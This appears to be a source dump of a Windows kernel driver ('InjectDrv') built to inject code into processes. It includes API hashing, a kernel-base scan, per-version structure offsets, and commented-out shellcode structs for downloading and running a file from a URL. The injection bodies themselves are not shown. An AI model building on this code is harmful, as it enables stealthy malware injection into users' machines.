├── ShellCode.c
├── x86Call.c
├── .gitattributes
├── InjectDrv.suo
├── InjectDrv.v11.suo
├── InjectDrv.vcproj
├── x64Call.h
├── sources
├── makefile
├── .gitignore
├── InjectDrv.c
├── x86Call.h
├── xDrvCall.Asm
├── InjectDrv.sln
├── Utils.h
├── x64Call.c
├── InjectDrv.vcproj.Seh_Cracker-PC.Seh_Cracker.user
├── ShellCode.h
├── InitializeInjectRelevantInfo.h
├── Utils.c
├── DrvCfg.h
├── InitializeInjectRelevantInfo.c
└── KernelApi.h
/ShellCode.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "ShellCode.h"
3 |
4 |
--------------------------------------------------------------------------------
/x86Call.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/x86Call.c
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
--------------------------------------------------------------------------------
/InjectDrv.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.suo
--------------------------------------------------------------------------------
/InjectDrv.v11.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.v11.suo
--------------------------------------------------------------------------------
/InjectDrv.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.vcproj
--------------------------------------------------------------------------------
/x64Call.h:
--------------------------------------------------------------------------------
1 | #ifndef __X64_CALL_H__
2 | #define __X64_CALL_H__
3 |
4 | PVOID x64GetNtoskrnlBase();
5 | #ifdef _WIN64
6 | extern ULONG x64_Check_Address(PVOID VirtualAddress);
7 | #endif
8 | #endif
--------------------------------------------------------------------------------
/sources:
--------------------------------------------------------------------------------
1 | TARGETNAME=InjectDrvx64
2 | TARGETPATH=./Bin
3 | TARGETTYPE=DRIVER
4 | TARGETLIBS=xDrvCall.lib
5 | BUFFER_OVERFLOW_CHECKS=0
6 | C_DEFINES=$(C_DEFINES) /Gz
7 |
8 | !IF $(FREEBUILD)
9 | MSC_OPTIMIZATION = /O1 /Oi /GS-
10 | MSC_STDCALL = 1
11 | MSC_WARNING_LEVEL=/W3 /WX
12 | !ENDIF
13 |
14 | SOURCES=InjectDrv.c \
15 | Utils.c \
16 | x86Call.c \
17 |
18 |
--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
1 | !IF 0
2 |
3 | Copyright (C) Microsoft Corporation, 1999 - 2002
4 |
5 | Module Name:
6 |
7 | makefile.
8 |
9 | Notes:
10 |
11 | DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
12 | file to this component. This file merely indirects to the real make file
13 | that is shared by all the components of Windows NT (DDK)
14 |
15 | !ENDIF
16 |
17 | !INCLUDE $(NTMAKEENV)\makefile.def
18 |
19 | MSC_WARNING_LEVEL=/W1
20 |
21 |
22 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Object files
5 | *.o
6 | *.ko
7 | *.obj
8 | *.elf
9 |
10 | # Linker output
11 | *.ilk
12 | *.map
13 | *.exp
14 |
15 | # Precompiled Headers
16 | *.gch
17 | *.pch
18 |
19 | # Libraries
20 | *.lib
21 | *.a
22 | *.la
23 | *.lo
24 |
25 | # Shared objects (inc. Windows DLLs)
26 | *.dll
27 | *.so
28 | *.so.*
29 | *.dylib
30 |
31 | # Executables
32 | *.exe
33 | *.out
34 | *.app
35 | *.i*86
36 | *.x86_64
37 | *.hex
38 |
39 | # Debug files
40 | *.dSYM/
41 | *.su
42 | *.idb
43 | *.pdb
44 |
45 | # Kernel Module Compile Results
46 | *.mod*
47 | *.cmd
48 | modules.order
49 | Module.symvers
50 | Mkfile.old
51 | dkms.conf
52 |
--------------------------------------------------------------------------------
/InjectDrv.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "x86Call.h"
3 | #include "x64Call.h"
4 |
5 | extern void x64_Call_Loader(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
6 | extern void x64_Call_Work();
7 |
/*
 * Driver entry point.
 *
 * Both parameters are marked unreferenced: the driver object is never
 * touched, so no dispatch routines and no DriverUnload routine are installed.
 *
 * x86 build : fills the global API table via InitializeFunctionDat().
 * x64 build : resolves kernel routines by name hash from the image returned
 *             by GetModuleBaseAddress(NULL) (both prototypes are in
 *             x86Call.h; presumably NULL selects the kernel image itself —
 *             confirm in x86Call.c).
 *
 * Returns STATUS_SUCCESS unconditionally. The ULONG_PTR result of
 * Get_Kernel_Api_From_HashValue is discarded, so a failed resolution still
 * leaves the driver loaded with an unfilled table.
 * NOTE(review): consider propagating a failure status here instead.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pUniRegister)
{
    NTSTATUS Status;

    UNREFERENCED_PARAMETER(pDriverObject);
    UNREFERENCED_PARAMETER(pUniRegister);
#ifndef _WIN64
    //x86_Call_Initialize(ExAllocatePoolWithTag,pDriverObject->DriverStart);
    //x86_Call_Work();
    InitializeFunctionDat(g_pFunctionDat);
#else
    //x64_Call_Loader(NULL,NULL);
    //x64_Call_Work();
    //x64GetNtoskrnlBase();

    //DbgPrint(pShow);
    //InitializeFunctionDat(g_pFunctionDat);

    /* Return value (ULONG_PTR) is ignored: nothing checks that resolution succeeded. */
    Get_Kernel_Api_From_HashValue((PVOID)GetModuleBaseAddress(NULL));

#endif
    Status = STATUS_SUCCESS;
    return Status;
}
--------------------------------------------------------------------------------
/x86Call.h:
--------------------------------------------------------------------------------
1 | #ifndef __X86_CALL_H__
2 | #define __X86_CALL_H__
3 |
4 | void InitializeFunctionDat(PFUNCTION_DAT pFunctionDat);
5 | void x86_Call_Initialize(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
6 | void x86_Call_Work();
7 | ULONG Initialize_Reload(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
8 | void Sti();
9 | void Cli();
10 | ULONG_PTR ReadCr4();
11 | ULONG_PTR *x86GetNtoskrnlBase();
12 | BOOLEAN SubEntry(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
13 | PVOID GetModuleBaseAddress(PCHAR pModuleName);
14 | ULONG_PTR Get_Kernel_Api_From_HashValue(PVOID pImageBase);
15 | PVOID AllocateMemoryFromTargetProcess(PVOID pEProcess);
16 | BOOLEAN InjectProcess(HANDLE hProcessId);
17 | BOOLEAN InsertApc(PVOID pShellCode,PKAPC pApc);
18 | VOID InjectNotifyRoutine(PUNICODE_STRING FullImageName,HANDLE ProcessId,PIMAGE_INFO ImageInfo);
19 |
20 | //VOID SystemSleep(LONGLONG sec);
21 | //VOID SystemReboot();
22 | //LONG MyGetCurrentTime();
23 |
24 | #endif
--------------------------------------------------------------------------------
/xDrvCall.Asm:
--------------------------------------------------------------------------------
1 |
2 | extern Initialize_Reload:proc
3 | extern SubEntry:proc
4 |
5 | _TEXT segment
6 |
7 | FasterCodeAlignement EQU 10h
8 |
9 | ALIGN FasterCodeAlignement
10 |
11 | x64_Check_Address proc
12 |
13 | and rcx,0FFFFFFFFFFFFF000h
14 | mov rdx,0FFFFF6FB7DBED000h
15 | mov rax,rcx
16 | shr rax,24h
17 | and eax,0FF8h
18 | test byte ptr [rax + rdx],1
19 | jnz IsValidAddress
20 | x64_Check_Address_Return:
21 | xor eax,eax
22 | ret
23 | IsValidAddress:
24 | mov rax,rcx
25 | mov rdx,0FFFFF6FB7DA00000h
26 | shr rax,1Bh
27 | and eax,1FFFF8h
28 | test byte ptr [rax + rdx],1
29 | jz x64_Check_Address_Return
30 | mov rax,rcx
31 | mov rdx,0FFFFF6FB40000000h
32 | shr rax,12h
33 | and eax,3FFFFFF8h
34 | mov rdx,[rax + rdx]
35 | test dl,1
36 | jz x64_Check_Address_Return
37 | and dl,81h
38 | cmp dl,81h
39 | jz x64_Check_Address_Return
40 | mov rax,7FFFFFFFF8h
41 | shr rcx,9
42 | mov rdx,0FFFFF68000000000h
43 | and rcx,rdx
44 | movzx eax,byte ptr [rcx + rdx]
45 | and eax,1
46 | ret
47 | x64_Check_Address endp
48 |
49 | x64_Call_Loader proc
50 | mov eax,40404040h
51 | jmp Initialize_Reload
52 | x64_Call_Loader endp
53 |
54 | x64_Call_Work proc
55 | nop
56 | nop
57 | mov eax,80808080h
58 | jmp SubEntry
59 | x64_Call_Work endp
60 |
61 | _TEXT ends
62 |
63 | end
--------------------------------------------------------------------------------
/InjectDrv.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDrv", "InjectDrv.vcproj", "{2F016A3A-0C8F-404B-B558-0C5722064C4C}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|Win32.Build.0 = Debug|Win32
16 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|x64.ActiveCfg = Debug|x64
17 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|x64.Build.0 = Debug|x64
18 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|Win32.ActiveCfg = Release|Win32
19 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|Win32.Build.0 = Release|Win32
20 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|x64.ActiveCfg = Release|x64
21 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Utils.h:
--------------------------------------------------------------------------------
1 | #ifndef __UTILS_H__
2 | #define __UTILS_H__
3 |
4 | #ifndef _WIN64
5 | void __stdcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength);
6 | #else
7 | void __fastcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength);
8 | #endif
9 |
10 | #ifndef _WIN64
11 | PCHAR __stdcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength);
12 | #else
13 | PCHAR __fastcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength);
14 | #endif
15 |
16 | #ifndef _WIN64
17 | ULONG __stdcall CalcHashValue(char *szApiName);
18 | #else
19 | ULONG __fastcall CalcHashValue(char *szApiName);
20 | #endif
21 |
22 | #ifndef _WIN64
23 | int __stdcall My_memicmp(char *src,char *dest,int size);
24 | #else
25 | int __fastcall My_memicmp(char *src,char *dest,int size);
26 | #endif
27 |
28 | #ifndef _WIN64
29 | char *__stdcall My_stristr(char *src,char *dest);
30 | #else
31 | char *__fastcall My_stristr(char *src,char *dest);
32 | #endif
33 |
34 | #ifndef _WIN64
35 | int __stdcall my_strlen(char *str);
36 | #else
37 | int __fastcall my_strlen(char *str);
38 | #endif
39 |
40 | #ifndef _WIN64
41 | int __stdcall my_strcmp(char *src,char *dest);
42 | #else
43 | int __fastcall my_strcmp(char *src,char *dest);
44 | #endif
45 |
46 | #ifndef _WIN64
47 | PCHAR __stdcall MyStrLower(PCHAR pSrc);
48 | #else
49 | PCHAR __fastcall MyStrLower(PCHAR pSrc);
50 | #endif
51 |
52 | #endif
--------------------------------------------------------------------------------
/x64Call.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "Utils.h"
3 | #include "x64Call.h"
4 |
5 | //BOOLEAN MyIsAddressValid(PVOID VirtualAddress)
6 | //{
7 | // if (((ULONG_PTR)((ULONG)((VirtualAddress & 0xFFFFFFFFFFFFF000) >> 0x24) & 0xFF8) + 0xFFFFF6FB7DBED000) & 1 == 0)
8 | // {
9 | // return FALSE;
10 | // }
11 | // if (((ULONG_PTR)(((ULONG)(VirtualAddress >> 0x1B)) & 0x1FFFF8) + 0xFFFFF6FB7DA00000) & 1 == 0)
12 | // {
13 | // return FALSE;
14 | // }
15 | // if ((*(char*)((((ULONG)(VirtualAddress >> 0x12)) & 0x3FFFFFF8) + 0xFFFFF6FB40000000)) & 1 == 0)
16 | // {
17 | // return FALSE;
18 | // }
19 | //}
20 | #ifdef _WIN64
21 |
/*
 * Locate the base of the kernel image on x64 by scanning the address range
 * [0xFFFFF80000000000, 0xFFFFF90000000000).
 *
 * A candidate address is only dereferenced after x64_Check_Address
 * (xDrvCall.Asm) reports it as present. It is accepted when it starts with
 * a DOS header, the NT header signature matches, the export directory is
 * non-empty and the export table lists more than 0x320 functions.
 *
 * Returns the first matching address, or NULL when the range is exhausted.
 *
 * NOTE(review): ulStartSearchAddress is a ULONG_PTR*, so `+= 0x1000` steps
 * 0x1000 * sizeof(ULONG_PTR) = 0x8000 bytes per iteration, not one
 * 0x1000-byte page as the constant suggests; an image base that is not
 * 0x8000-aligned would be skipped. Looks unintended — confirm.
 * NOTE(review): "more than 0x320 exports" is the only property that
 * distinguishes the kernel from any other large image mapped in the range;
 * the caller gets no further confirmation of what was found.
 * NOTE(review): x64_Check_Address hard-codes the virtual addresses of the
 * page-table hierarchy (the 0xFFFFF6FB... / 0xFFFFF680... constants in
 * xDrvCall.Asm). On a kernel that maps the page tables elsewhere the
 * validity check itself reads an unmapped address — confirm the supported
 * target builds before relying on it.
 */
PVOID x64GetNtoskrnlBase()
{
    ULONG_PTR *ulStartSearchAddress;
    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS pNtHeader;
    PIMAGE_EXPORT_DIRECTORY pEat;

    ulStartSearchAddress = (ULONG_PTR *)0xFFFFF80000000000;
    do
    {
        /* Never touch the page before the presence check succeeds. */
        if (x64_Check_Address((PVOID)ulStartSearchAddress) != 0)
        {
            pDosHeader = (PIMAGE_DOS_HEADER)ulStartSearchAddress;
            if (pDosHeader->e_magic == IMAGE_DOS_SIGNATURE)
            {
                /* e_lfanew is trusted as-is; the NT header page is not re-checked. */
                pNtHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pDosHeader + pDosHeader->e_lfanew);
                if (pNtHeader->Signature == IMAGE_NT_SIGNATURE)
                {
                    if (pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress != 0 && \
                        pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size != 0)
                    {
                        pEat = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)pDosHeader + pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
                        /* Heuristic: only a very large exporter is taken to be the kernel. */
                        if (pEat->NumberOfFunctions > 0x320)
                        {
                            return (PVOID)ulStartSearchAddress;
                        }
                    }
                }
            }
        }
        /* Pointer arithmetic on ULONG_PTR*: advances 0x8000 bytes, see note above. */
        ulStartSearchAddress += 0x1000;
    } while ((ULONG_PTR)ulStartSearchAddress < 0xFFFFF90000000000);
    return NULL;
}
56 |
57 | #endif
--------------------------------------------------------------------------------
/InjectDrv.vcproj.Seh_Cracker-PC.Seh_Cracker.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/ShellCode.h:
--------------------------------------------------------------------------------
1 | #ifndef __SHELL_CODE_H__
2 | #define __SHELL_CODE_H__
3 |
4 | /*
5 | #ifndef _WIN64
6 |
7 | typedef HANDLE (__stdcall *CREATEFILE)(LPCTSTR lpFileName, \
8 | DWORD dwDesiredAccess, \
9 | DWORD dwShareMode, \
10 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, \
11 | DWORD dwCreationDisposition, \
12 | DWORD dwFlagsAndAttributes, \
13 | HANDLE hTemplateFile);
14 | typedef BOOL (__stdcall *WRITEFILE)(HANDLE hFile, \
15 | LPCVOID lpBuffer, \
16 | DWORD nNumberOfBytesToWrite, \
17 | LPDWORD lpNumberOfBytesWritten, \
18 | LPOVERLAPPED lpOverlapped);
19 | typedef HRESULT (__stdcall *CLOSEHANDLE)(HANDLE hHandle);
20 | typedef BOOL (__stdcall *SHELLEXECUTEEX)(SHELLEXECUTEINFO *pExecInfo);
21 | typedef UINT (__stdcall *WINEXEC)(LPCSTR lpCmdLine,UINT uCmdShow);
22 | typedef HRESULT (__stdcall *URLDOWNLOADTOFILE)(LPUNKNOWN pCaller, \
23 | LPCTSTR szURL, \
24 | LPCTSTR szFileName, \
25 | DWORD dwReserved, \
26 | LPBINDSTATUSCALLBACK lpfnCB);
27 | typedef DWORD (__stdcall *GETTEMPPATH)(DWORD nBufferLength,LPTSTR lpBuffer);
28 |
29 | #else
30 |
31 | typedef HANDLE (__fastcall *CREATEFILE)(LPCTSTR lpFileName, \
32 | DWORD dwDesiredAccess, \
33 | DWORD dwShareMode, \
34 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, \
35 | DWORD dwCreationDisposition, \
36 | DWORD dwFlagsAndAttributes, \
37 | HANDLE hTemplateFile);
38 | typedef BOOL (__fastcall *WRITEFILE)(HANDLE hFile, \
39 | LPCVOID lpBuffer, \
40 | DWORD nNumberOfBytesToWrite, \
41 | LPDWORD lpNumberOfBytesWritten, \
42 | LPOVERLAPPED lpOverlapped);
43 | typedef HRESULT (__fastcall *CLOSEHANDLE)(HANDLE hHandle);
44 | typedef BOOL (__fastcall *SHELLEXECUTEEX)(SHELLEXECUTEINFO *pExecInfo);
45 | typedef UINT (__fastcall *WINEXEC)(LPCSTR lpCmdLine,UINT uCmdShow);
46 | typedef HRESULT (__fastcall *URLDOWNLOADTOFILE)(LPUNKNOWN pCaller, \
47 | LPCTSTR szURL, \
48 | LPCTSTR szFileName, \
49 | DWORD dwReserved, \
50 | LPBINDSTATUSCALLBACK lpfnCB);
51 | typedef DWORD (__fastcall *GETTEMPPATH)(DWORD nBufferLength,LPTSTR lpBuffer);
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 | #endif
60 |
61 |
62 | typedef struct _SHELL_CODE_IMPORT_KERNEL32
63 | {
64 | WCHAR wKernel32[] = {'k','e','r','n','e','l','3','2','.','d','l','l',L'\0'};
65 | CREATEFILE ShellCodeCreateFile;
66 | WRITEFILE ShellCodeWriteFile;
67 | CLOSEHANDLE ShellCodeCloseHandle;
68 | WINEXEC ShellCodeWinExec;
69 | GETTEMPPATH ShellCodeGetTempPath;
70 |
71 | }SHELL_CODE_IMPORT_KERNEL32,*PSHELL_CODE_IMPORT_KERNEL32;
72 |
73 | typedef struct _SHELL_CODE_IMPORT_URLMON
74 | {
75 | WCHAR wUrlMon[] = {'u','r','l','m','o','n','.','d','l','l',L'\0'};
76 | URLDOWNLOADTOFILE ShellCodeUrlDownloadToFile;
77 | }SHELL_CODE_IMPORT_URLMON,*PSHELL_CODE_IMPORT_URLMON;
78 |
79 | typedef struct _SHELL_CODE_PARAM
80 | {
81 | ULONG ulShellCodeLength;
82 | PVOID pShellCodeStartAddress;
83 | SHELL_CODE_IMPORT_KERNEL32 ShellCodeImportKernel32;
84 | SHELL_CODE_IMPORT_URLMON ShellCodeImportUrlMon;
85 | WCHAR wUrl[MAX_PATH];
86 | }SHELL_CODE_PARAM,*PSHELL_CODE_PARAM;
87 | */
88 | #endif
--------------------------------------------------------------------------------
/InitializeInjectRelevantInfo.h:
--------------------------------------------------------------------------------
1 | #ifndef __INITIALIZE_INJECT_RELEVANT_INFO__
2 | #define __INITIALIZE_INJECT_RELEVANT_INFO__
3 |
4 | #define DELAY_ONE_MICROSECOND (-10)
5 | #define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)
6 | #define DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000)
7 |
8 | #ifndef POWER_FAILURE_SIMULATE
9 | #define POWER_FAILURE_SIMULATE 0x000000E5
10 | #endif
11 |
12 |
/*
 * Per-thread bookkeeping node. It currently carries nothing but its list
 * linkage; no payload fields have been added yet.
 */
typedef struct _INJECT_THREAD
{
    LIST_ENTRY NextThread;   /* link in a doubly linked list of these nodes */

}INJECT_THREAD,*PINJECT_THREAD;
18 |
/*
 * Per-process bookkeeping node. Like INJECT_THREAD it holds only its list
 * linkage so far.
 */
typedef struct _INJECT_PROCESS
{
    LIST_ENTRY NextProcess;  /* link in a doubly linked list of these nodes */

}INJECT_PROCESS,*PINJECT_PROCESS;
24 |
/*
 * Identity of one target: its process id, a hash, and a thread object.
 * The hash format is not shown on this page (likely the CalcHashValue()
 * form of a name — confirm in the code that fills it); pEThread is
 * presumably the thread handed to InsertApc (x86Call.h).
 */
typedef struct _INJECT_TARGET_INFO
{
    HANDLE hInjectPid;       /* process id, kept as a HANDLE like the kernel does */
    ULONG ulHashValue;       /* name hash; producer not visible here */
    PVOID pEThread;          /* thread object pointer, untyped */
}INJECT_TARGET_INFO,*PINJECT_TARGET_INFO;
/*
 * Major/minor/build triple plus the CSD (service pack) string of the
 * running kernel. The field set matches the out-parameters of PsGetVersion,
 * whose pointer the function table carries (My_PsGetVersion in DrvCfg.h) —
 * presumably the source of these values; not confirmed on this page.
 * unStrCSDVersion is a pointer, so the UNICODE_STRING it refers to must
 * outlive this struct.
 */
typedef struct _SYSTEM_VERSION
{
    ULONG ulMajorVersion;
    ULONG ulMinorVersion;
    ULONG ulBuildNumber;
    PUNICODE_STRING unStrCSDVersion;   /* not owned; see note above */
}SYSTEM_VERSION,*PSYSTEM_VERSION;
/*
 * Kernel-version flags packed into a single ULONG_PTR.
 *
 * ulReserved is sized so that the padding plus the twelve flag bits fill
 * the word exactly: 20 + 12 = 32 on x86, 52 + 12 = 64 on x64.
 * The InitializeWindows* routines set the flag for the detected version and
 * bIs64Bit; nothing visible clears the other flags, so the struct must start
 * zeroed (g_InjectRelevantOffset is zero-initialised).
 */
typedef struct _WINDOWS_VERSION
{
#ifndef _WIN64
    ULONG_PTR ulReserved:20;
#else
    ULONG_PTR ulReserved:52;
#endif
    ULONG_PTR bIsUnknow:1;
    ULONG_PTR bIsWindows2000:1;
    ULONG_PTR bIsWindowsXp:1;
    ULONG_PTR bIsWindows2003:1;
    ULONG_PTR bIsWindowsVista:1;
    ULONG_PTR bIsWindows7:1;
    ULONG_PTR bIsWindows2008:1;
    ULONG_PTR bIsWindows8:1;
    ULONG_PTR bIsWindows81:1;
    ULONG_PTR bIsWindows10:1;
    ULONG_PTR bIsWindows2012:1;
    ULONG_PTR bIs64Bit:1;    /* set alongside the version flag, not a version by itself */
}WINDOWS_VERSION,*PWINDOWS_VERSION;
/*
 * Byte offsets into undocumented kernel objects for the running build.
 *
 * The "Process" and "Thread" groups are offsets into the process and thread
 * objects, "PEB" and "Teb" into the user-mode PEB and TEB; WindowsVersion
 * records which build the table was filled for. Each InitializeWindows*
 * routine in InitializeInjectRelevantInfo.c writes one version's values,
 * and several of those tables still contain 0x00 placeholders.
 *
 * NOTE(review): a wrong or unfilled offset cannot be detected at run time —
 * reads simply land on the wrong field — so the version dispatch that
 * selects the table is the first thing to verify.
 */
typedef struct _INJECT_RELEVANT_OFFSET
{
    //Process
    ULONG_PTR ulOffsetPeb;
    ULONG_PTR ulOffsetName;
    ULONG_PTR ulOffsetFlink;
    ULONG_PTR ulOffsetResv;               /* never written by the visible Initialize* routines */
    ULONG_PTR ulOffsetThreadListHead;
    ULONG_PTR ulOffsetPid;

    //Thread
    ULONG_PTR ulOffsetThreadListEntry;
    ULONG_PTR ulOffsetSuspendCount;
    ULONG_PTR ulOffsetCrossThreadFlags;
    ULONG_PTR ulOffsetCid;
    ULONG_PTR ulOffsetTrapFrame;
    ULONG_PTR ulOffsetTeb;
    ULONG_PTR ulOffsetAlerted;            /* only the Windows 7 table sets this */
    ULONG_PTR ulOffsetAlertable;
    ULONG_PTR ulOffsetApcState;

    //PEB
    ULONG_PTR ulOffsetPebLdr;
    ULONG_PTR ulOffsetPebModuleListEntry;

    //Teb
    ULONG_PTR ulOffsetActivationContextStackPointer;

    WINDOWS_VERSION WindowsVersion;       /* which build the offsets above belong to */
}INJECT_RELEVANT_OFFSET,*PINJECT_RELEVANT_OFFSET;
88 |
89 | extern INJECT_RELEVANT_OFFSET g_InjectRelevantOffset;
90 |
91 | NTSTATUS IsWindows64Bits(PVOID pCurProcess);
92 | BOOLEAN InitializeWindows2k(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
93 | BOOLEAN InitializeWindowsXp(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
94 | BOOLEAN InitializeWindows2003(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
95 | NTSTATUS InitializeWindows7(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
96 | NTSTATUS InitializeWindows8(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
97 | NTSTATUS InitializeWindows8_1(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
98 | NTSTATUS InitializeWindows10(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
99 | BOOLEAN InitializeInjectInformation(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
100 |
101 |
102 | #endif
103 |
--------------------------------------------------------------------------------
/Utils.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "Utils.h"
3 |
/*
 * Write zero over the first ulLength bytes of pCleanBuffer.
 *
 * Bytes that are already zero are skipped rather than re-written.
 * ulLength == 0 is a no-op; the buffer is not touched.
 *
 * NOTE(review): if this is ever used to scrub sensitive data before a
 * buffer is released, a plain store loop can be dropped by the optimizer
 * once the buffer is dead; a volatile-qualified store or
 * RtlSecureZeroMemory is the reliable form for that purpose.
 */
#ifndef _WIN64
void __stdcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength)
#else
void __fastcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength)
#endif
{
    ULONG i;

    for (i = 0; i < ulLength; i++)
    {
        if (pCleanBuffer[i] != 0)
        {
            pCleanBuffer[i] = 0;
        }
    }
}
/*
 * Copy ulLength bytes from pSrc to pDst, front to back.
 *
 * Returns the destination cursor AFTER the copy, i.e. pDst + ulLength —
 * unlike memcpy(), which returns the original destination. Callers that
 * chain copies rely on this; do not "fix" it.
 *
 * Because the copy runs forwards, overlapping ranges where pDst lies inside
 * [pSrc, pSrc + ulLength) are not handled correctly (memmove semantics are
 * not provided). ulLength == 0 copies nothing and returns pDst unchanged.
 */
#ifndef _WIN64
PCHAR __stdcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength)
#else
PCHAR __fastcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength)
#endif
{
    ULONG ulRemaining;

    for (ulRemaining = ulLength; ulRemaining != 0; ulRemaining--)
    {
        *pDst = *pSrc;
        pDst++;
        pSrc++;
    }
    /* pDst has been advanced ulLength times by now. */
    return pDst;
}
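/*
 * Hash a NUL-terminated routine name into a 32-bit value.
 *
 * Low 16 bits : the running sum of the characters, starting from 1, kept
 *               in a USHORT so it wraps at 16 bits.
 * High 16 bits: the low word of the sum of every intermediate value of that
 *               running sum.
 *
 * ulHashValue must stay USHORT: the *_HashValue constants in FUNCTION_DAT
 * (DrvCfg.h) presumably come from exactly this arithmetic, and widening the
 * accumulator would change every result.
 * CHAR is signed, so bytes >= 0x80 are sign-extended before being added;
 * irrelevant for ASCII export names. What my_strlen() does with a NULL
 * argument is not visible here — pass a valid string.
 *
 * Change: my_strlen() is loop-invariant (the string is never modified in
 * the loop) and is now evaluated once instead of on every iteration.
 */
#ifndef _WIN64
ULONG __stdcall CalcHashValue(char *szApiName)
#else
ULONG __fastcall CalcHashValue(char *szApiName)
#endif
{
    USHORT ulHashValue;     /* 16-bit running sum, see header comment */
    ULONG ulTmp,ulOrValue;
    int nLength;
    int i;
    CHAR szTmp;

    ulHashValue = 1;
    ulOrValue = 0;

    nLength = my_strlen(szApiName);
    for (i = 0;i < nLength;i++)
    {
        szTmp = szApiName[i];
        ulHashValue += szTmp;
        ulOrValue += ulHashValue;
    }
    ulTmp = ulOrValue << 0x10;
    ulTmp |= ulHashValue;
    return ulTmp;
}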
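/*
 * Case-insensitive comparison of `size` bytes of src and dest.
 *
 * Returns 0 when every byte pair matches ignoring ASCII letter case, and -1
 * at the first pair that does not. Only mismatch is reported, never
 * ordering, and the comparison does not stop at a NUL byte: all `size`
 * bytes are examined, so both buffers must be at least that long.
 * size <= 0 compares nothing and returns 0.
 *
 * Fix: the original folded case with an unconditional `c - 'A' + 'a'`
 * (i.e. c + 0x20) applied to either side, so any byte pair exactly 0x20
 * apart compared equal — '1' matched 'Q', '!' matched 'A'. Folding now
 * applies only to 'A'..'Z'. A negative size previously ran the loop until
 * the counter wrapped; it is now treated as empty.
 */
#ifndef _WIN64
int __stdcall My_memicmp(char *src,char *dest,int size)
#else
int __fastcall My_memicmp(char *src,char *dest,int size)
#endif
{
    unsigned char a;
    unsigned char b;

    while (size-- > 0)
    {
        a = (unsigned char)*src++;
        b = (unsigned char)*dest++;
        /* ASCII-only case fold; non-letters are compared as-is. */
        if (a >= 'A' && a <= 'Z')
        {
            a = (unsigned char)(a + ('a' - 'A'));
        }
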